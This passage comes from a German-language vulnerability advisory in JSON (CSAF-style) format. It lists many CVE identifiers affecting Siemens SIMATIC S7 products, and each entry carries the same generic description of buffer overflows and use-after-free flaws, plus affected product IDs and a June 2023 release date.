Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-42703" }, { "cve": "CVE-2022-42432", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-42432" }, { "cve": "CVE-2022-42329", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-42329" }, { "cve": "CVE-2022-42328", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-42328" }, { "cve": "CVE-2022-41850", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-41850" }, { "cve": "CVE-2022-41849", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-41849" }, { "cve": "CVE-2022-41674", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-41674" }, { "cve": "CVE-2022-4139", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-4139" }, { "cve": "CVE-2022-4129", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-4129" }, { "cve": "CVE-2022-41222", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-41222" }, { "cve": "CVE-2022-41218", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-41218" }, { "cve": "CVE-2022-4095", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-4095" }, { "cve": "CVE-2022-40768", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-40768" }, { "cve": "CVE-2022-40307", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-40307" }, { "cve": "CVE-2022-39190", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-39190" }, { "cve": "CVE-2022-39188", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-39188" }, { "cve": "CVE-2022-36946", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-36946" }, { "cve": "CVE-2022-36879", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-36879" }, { "cve": "CVE-2022-3649", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3649" }, { "cve": "CVE-2022-3646", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3646" }, { "cve": "CVE-2022-3635", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3635" }, { "cve": "CVE-2022-3633", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3633" }, { "cve": "CVE-2022-3629", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3629" }, { "cve": "CVE-2022-36280", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-36280" }, { "cve": "CVE-2022-3628", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3628" }, { "cve": "CVE-2022-3625", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3625" }, { "cve": "CVE-2022-3621", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3621" }, { "cve": "CVE-2022-36123", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-36123" }, { "cve": "CVE-2022-3606", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3606" }, { "cve": "CVE-2022-3594", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3594" }, { "cve": "CVE-2022-3586", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3586" }, { "cve": "CVE-2022-3565", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3565" }, { "cve": "CVE-2022-3564", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3564" }, { "cve": "CVE-2022-3545", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3545" }, { "cve": "CVE-2022-3534", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3534" }, { "cve": "CVE-2022-3524", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": 